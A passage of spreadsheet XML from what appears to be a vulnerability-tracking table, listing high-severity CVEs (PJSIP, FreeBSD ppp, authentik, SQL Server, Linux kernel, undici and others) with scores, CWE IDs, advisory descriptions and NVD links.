      <c r="L816" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit c4a151a, a stack buffer overflow exists in the GnuTLS TLS backend when parsing the Subject Alternative Name extension of a peer certificate (tls_cert_get_info() in ssl_sock_gtls.c). Only GnuTLS builds are affected (--with-gnutls); OpenSSL and Apple SecureTransport/Network.framework builds are not affected. While extracting certificate information after a TLS handshake, an incorrect buffer-size value can cause an oversized SubjectAltName entry to be written past the end of a fixed-size stack buffer. A network-positioned attacker presenting a crafted certificate — a malicious server to a connecting client, or a malicious client to a server that requests certificates — can trigger this during the TLS handshake, before any SIP-level authentication. Impact may range from unexpected application termination to control flow hijack/memory corruption. This issue has been patched via commit c4a151a.</t>
        </is>
      </c>
      <c r="M816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57163</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57866</t>
        </is>
      </c>
      <c r="C817" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D817" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E817" s="5" t="inlineStr"/>
      <c r="F817" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G817" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H817" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="I817" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J817" s="5" t="inlineStr"/>
      <c r="K817" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L817" s="5" t="inlineStr">
        <is>
          <t>Server side request forgery in Apache Impala versions 4.4.x and 4.5.x.  Authenticated Impala users with permissions to execute the ai_generate_text() function can exfiltrate secrets provided by the credential providers configured in the `hadoop.security.credential.provider.path` property of `core-site.xml`. The secret's key must be known to the user.</t>
        </is>
      </c>
      <c r="M817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57866</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58095</t>
        </is>
      </c>
      <c r="C818" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D818" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E818" s="5" t="inlineStr"/>
      <c r="F818" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G818" s="5" t="inlineStr"/>
      <c r="H818" s="5" t="inlineStr">
        <is>
          <t>freebsd:freebsd</t>
        </is>
      </c>
      <c r="I818" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J818" s="5" t="inlineStr"/>
      <c r="K818" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L818" s="5" t="inlineStr">
        <is>
          <t>mp_Enddisc() used incorrect length calculations when formatting endpoint discriminator addresses for display, allowing a received endpoint option to overflow a global result buffer.
A malicious PPP peer can crash ppp(8) or potentially execute arbitrary code as root.</t>
        </is>
      </c>
      <c r="M818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58095</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58096</t>
        </is>
      </c>
      <c r="C819" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D819" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E819" s="5" t="inlineStr"/>
      <c r="F819" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G819" s="5" t="inlineStr"/>
      <c r="H819" s="5" t="inlineStr">
        <is>
          <t>freebsd:freebsd</t>
        </is>
      </c>
      <c r="I819" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J819" s="5" t="inlineStr"/>
      <c r="K819" s="5" t="inlineStr">
        <is>
          <t>CWE-130, CWE-787</t>
        </is>
      </c>
      <c r="L819" s="5" t="inlineStr">
        <is>
          <t>LcpDecodeConfig() did not validate the length of received endpoint discriminator options against the minimum required by RFC 1717.  Undersized options would trigger an out-of-bounds write.
A malicious PPP peer can exploit CVE-2026-58095 and CVE-2026-58096 to crash ppp(8) or potentially execute arbitrary code as root.</t>
        </is>
      </c>
      <c r="M819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58096</t>
        </is>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61574</t>
        </is>
      </c>
      <c r="C820" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D820" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E820" s="5" t="inlineStr"/>
      <c r="F820" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G820" s="5" t="inlineStr"/>
      <c r="H820" s="5" t="inlineStr"/>
      <c r="I820" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J820" s="5" t="inlineStr"/>
      <c r="K820" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="L820" s="5" t="inlineStr">
        <is>
          <t>authentik is an open-source identity provider. Prior to 2026.2.6 and 2026.5.5, the Remote Access Control endpoint list returns every configured endpoint to any authenticated user regardless of which applications the user may access, and the response includes connection settings that can contain stored credentials. The endpoint listing does not apply the access controls governing the endpoints, and the connection flow does not confirm that an endpoint belongs to the Remote Access Control application through which it was launched. Any authenticated user can therefore read every endpoint together with its host and stored credentials and can open a connection to an endpoint belonging to another application. This exposes stored credentials for managed RDP, SSH, and VNC targets and grants interactive access to systems the user was never authorized to reach. Deployments that do not use the enterprise Remote Access Control provider are not affected. This issue is fixed in versions 2026.2.6 and 2026.5.5.</t>
        </is>
      </c>
      <c r="M820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61574</t>
        </is>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62316</t>
        </is>
      </c>
      <c r="C821" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D821" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E821" s="5" t="inlineStr"/>
      <c r="F821" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G821" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H821" s="5" t="inlineStr"/>
      <c r="I821" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J821" s="5" t="inlineStr"/>
      <c r="K821" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-346</t>
        </is>
      </c>
      <c r="L821" s="5" t="inlineStr">
        <is>
          <t>Microsoft UFO open-source framework for intelligent automation across devices and platforms. Prior to 3.0.8, ufo/client/mcp/http_servers/linux_mcp_server.py binds a FastMCP streamable HTTP server to localhost:8010 but does not validate the Host, Origin, or Sec-Fetch-Site headers. An attacker-controlled web page can use DNS rebinding to reach the local /mcp endpoint, enumerate tool schemas through tools/list, and invoke execute_command with a valid UFO_MCP_API_KEY to read files or execute allowed operating system commands as the victim's user. This issue is fixed in version 3.0.8.</t>
        </is>
      </c>
      <c r="M821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62316</t>
        </is>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62357</t>
        </is>
      </c>
      <c r="C822" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D822" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E822" s="5" t="inlineStr"/>
      <c r="F822" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G822" s="5" t="inlineStr"/>
      <c r="H822" s="5" t="inlineStr"/>
      <c r="I822" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J822" s="5" t="inlineStr"/>
      <c r="K822" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L822" s="5" t="inlineStr">
        <is>
          <t>Dragonfly is an in-memory data store built for modern application workloads. Prior to 1.40.0, CMS.INITBYDIM and CMS.INITBYPROB accept dimensions whose width times depth times sizeof(int64_t) overflows in src/core/cms.cc, allocating an undersized counter buffer while CMS.INCRBY and CMS.QUERY use the unbounded dimensions, which allows an unauthenticated remote client to corrupt or disclose adjacent heap memory and crash the server. This issue is fixed in version 1.40.0.</t>
        </is>
      </c>
      <c r="M822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62357</t>
        </is>
      </c>
    </row>
    <row r="823">
      <c r="A823" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62666</t>
        </is>
      </c>
      <c r="C823" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D823" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E823" s="5" t="inlineStr"/>
      <c r="F823" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G823" s="5" t="inlineStr"/>
      <c r="H823" s="5" t="inlineStr"/>
      <c r="I823" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J823" s="5" t="inlineStr"/>
      <c r="K823" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L823" s="5" t="inlineStr">
        <is>
          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content. Prior to 1.0.6, Grav API plugin UsersController::createApiKey(), generate2fa(), and disable2fa() omit the accessGrantsSuper() target check used by sibling user mutation endpoints. A non-super account with api.users.write can mint an API key bound to an access.api.super target through requireApiKeyPermission(), obtain the target's full privileges because key scopes are not enforced, and create persistent super-administrator access; the same missing check also permits rotating or disabling the target's two-factor authentication. This issue is fixed in version 1.0.6.</t>
        </is>
      </c>
      <c r="M823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62666</t>
        </is>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62706</t>
        </is>
      </c>
      <c r="C824" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D824" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E824" s="5" t="inlineStr"/>
      <c r="F824" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G824" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H824" s="5" t="inlineStr"/>
      <c r="I824" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J824" s="5" t="inlineStr"/>
      <c r="K824" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="L824" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t>
        </is>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62744</t>
        </is>
      </c>
      <c r="C825" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D825" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E825" s="5" t="inlineStr"/>
      <c r="F825" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G825" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H825" s="5" t="inlineStr"/>
      <c r="I825" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J825" s="5" t="inlineStr"/>
      <c r="K825" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L825" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62744</t>
        </is>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62895</t>
        </is>
      </c>
      <c r="C826" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D826" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E826" s="5" t="inlineStr"/>
      <c r="F826" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G826" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H826" s="5" t="inlineStr"/>
      <c r="I826" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J826" s="5" t="inlineStr"/>
      <c r="K826" s="5" t="inlineStr">
        <is>
          <t>CWE-1390, CWE-89, CWE-942</t>
        </is>
      </c>
      <c r="L826" s="5" t="inlineStr">
        <is>
          <t>Permissive cross-domain policy with untrusted domains in Azure Arc allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62895</t>
        </is>
      </c>
    </row>
    <row r="827">
      <c r="A827" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64364</t>
        </is>
      </c>
      <c r="C827" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D827" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E827" s="5" t="inlineStr"/>
      <c r="F827" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G827" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H827" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I827" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J827" s="5" t="inlineStr"/>
      <c r="K827" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L827" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: multitouch: fix out-of-bounds bit access on mt_io_flags
mt_io_flags is a single unsigned long, but mt_process_slot(),
mt_release_pending_palms() and mt_release_contacts() use it as a
per-slot bitmap indexed by the slot number. That slot number is only
bounded by td-&gt;maxcontacts, which is taken from the device's
ContactCountMaximum feature report and can be up to 255, not by
BITS_PER_LONG.
As a result, a multitouch device that advertises a large contact count
makes set_bit()/clear_bit() operate past the mt_io_flags word and
corrupt the adjacent members of struct mt_device. The sticky-fingers
release timer is the easiest way to reach this. mt_release_contacts()
runs
	for (i = 0; i &lt; mt-&gt;num_slots; i++)
		clear_bit(i, &amp;td-&gt;mt_io_flags);
with num_slots == maxcontacts. For maxcontacts around 250 the loop
clears the bits that overlap td-&gt;applications.next, zeroing that list
head, and the list_for_each_entry() that immediately follows then
dereferences NULL. The kernel panics from timer (softirq) context. On a
KASAN build this shows up as a general protection fault in
mt_release_contacts() with a null-ptr-deref at offset 0x58, which is
offsetof(struct mt_application, num_received).
The state is reachable from an untrusted USB or Bluetooth HID
multitouch device; no local privileges are required.
Store the per-slot active state in a separately allocated bitmap sized
for maxcontacts, the same pattern already used for pending_palm_slots,
and keep only MT_IO_FLAGS_RUNNING in mt_io_flags. The two
"mt_io_flags &amp; MT_IO_SLOTS_MASK" arming checks become
bitmap_empty(td-&gt;active_slots, td-&gt;maxcontacts).
Move MT_IO_FLAGS_RUNNING back to bit 0. It was bumped to bit 32 by the
same commit to leave the low byte for the slot bits; with the slot bits
gone it fits in bit 0 again, which also keeps it within the unsigned
long on 32-bit.</t>
        </is>
      </c>
      <c r="M827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64364</t>
        </is>
      </c>
    </row>
    <row r="828">
      <c r="A828" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65772</t>
        </is>
      </c>
      <c r="C828" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D828" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E828" s="5" t="inlineStr"/>
      <c r="F828" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G828" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H828" s="5" t="inlineStr"/>
      <c r="I828" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J828" s="5" t="inlineStr"/>
      <c r="K828" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L828" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65772</t>
        </is>
      </c>
    </row>
    <row r="829">
      <c r="A829" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66814</t>
        </is>
      </c>
      <c r="C829" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D829" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E829" s="5" t="inlineStr"/>
      <c r="F829" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G829" s="5" t="inlineStr"/>
      <c r="H829" s="5" t="inlineStr"/>
      <c r="I829" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J829" s="5" t="inlineStr"/>
      <c r="K829" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="L829" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t>
        </is>
      </c>
    </row>
    <row r="830">
      <c r="A830" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66818</t>
        </is>
      </c>
      <c r="C830" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D830" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E830" s="5" t="inlineStr"/>
      <c r="F830" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G830" s="5" t="inlineStr"/>
      <c r="H830" s="5" t="inlineStr"/>
      <c r="I830" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J830" s="5" t="inlineStr"/>
      <c r="K830" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L830" s="5" t="inlineStr">
        <is>
          <t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t>
        </is>
      </c>
    </row>
    <row r="831">
      <c r="A831" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66819</t>
        </is>
      </c>
      <c r="C831" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D831" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E831" s="5" t="inlineStr"/>
      <c r="F831" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G831" s="5" t="inlineStr"/>
      <c r="H831" s="5" t="inlineStr"/>
      <c r="I831" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J831" s="5" t="inlineStr"/>
      <c r="K831" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L831" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t>
        </is>
      </c>
    </row>
    <row r="832">
      <c r="A832" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66820</t>
        </is>
      </c>
      <c r="C832" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D832" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E832" s="5" t="inlineStr"/>
      <c r="F832" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G832" s="5" t="inlineStr"/>
      <c r="H832" s="5" t="inlineStr"/>
      <c r="I832" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J832" s="5" t="inlineStr"/>
      <c r="K832" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L832" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t>
        </is>
      </c>
    </row>
    <row r="833">
      <c r="A833" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6734</t>
        </is>
      </c>
      <c r="C833" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D833" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E833" s="5" t="inlineStr"/>
      <c r="F833" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G833" s="5" t="inlineStr"/>
      <c r="H833" s="5" t="inlineStr">
        <is>
          <t>nodejs:undici</t>
        </is>
      </c>
      <c r="I833" s="5" t="inlineStr">
        <is>
          <t>2026-06-17</t>
        </is>
      </c>
      <c r="J833" s="5" t="inlineStr"/>
      <c r="K833" s="5" t="inlineStr">
        <is>
          <t>CWE-346, CWE-940</t>
        </is>
      </c>
      <c r="L833" s="5" t="inlineStr">
        <is>
          <t>Impact:
When using Socks5ProxyAgent, undici reuses a single connection pool across different origins without verifying that the pool's origin matches the requested origin. All requests are dispatched through the pool connected to the first origin, regardless of the intended destination.
This causes cross-origin request routing: credentials and request data intended for origin B are sent to origin A, responses from the wrong origin are trusted, and HTTPS requests may be silently downgraded to HTTP.
Impacted users are applications that use Socks5ProxyAgent (directly or via setGlobalDispatcher) and make requests to more than one origin.
This was introduced in undici 7.23.0 via PR #4385 and affects all versions through 8.1.0.
Patches:
Upgrade to undici v7.26.0 or v8.2.0.
Workarounds:
Use a separate Socks5ProxyAgent instance per origin, or avoid using Socks5ProxyAgent with multiple origins.</t>
        </is>
      </c>
      <c r="M833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6734</t>
        </is>
      </c>
    </row>
    <row r="834">
      <c r="A834" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67368</t>
        </is>
      </c>
      <c r="C834" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D834" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E834" s="5" t="inlineStr"/>
      <c r="F834" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G834" s="5" t="inlineStr"/>
      <c r="H834" s="5" t="inlineStr"/>
      <c r="I834" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J834" s="5" t="inlineStr"/>
      <c r="K834" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L834" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67368</t>
        </is>
      </c>
    </row>
    <row r="835">
      <c r="A835" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67370</t>
        </is>
      </c>
      <c r="C835" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D835" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E835" s="5" t="inlineStr"/>
      <c r="F835" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G835" s="5" t="inlineStr"/>
      <c r="H835" s="5" t="inlineStr"/>
      <c r="I835" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J835" s="5" t="inlineStr"/>
      <c r="K835" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L835" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t>
        </is>
      </c>
    </row>
    <row r="836">
      <c r="A836" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67373</t>
        </is>
      </c>
      <c r="C836" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D836" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E836" s="5" t="inlineStr"/>
      <c r="F836" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G836" s="5" t="inlineStr"/>
      <c r="H836" s="5" t="inlineStr"/>
      <c r="I836" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J836" s="5" t="inlineStr"/>
      <c r="K836" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L836" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t>
        </is>
      </c>
    </row>
    <row r="837">
      <c r="A837" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67380</t>
        </is>
      </c>
      <c r="C837" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D837" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E837" s="5" t="inlineStr"/>
      <c r="F837" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G837" s="5" t="inlineStr"/>
      <c r="H837" s="5" t="inlineStr"/>
      <c r="I837" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J837" s="5" t="inlineStr"/>
      <c r="K837" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L837" s="5" t="inlineStr">
        <is>
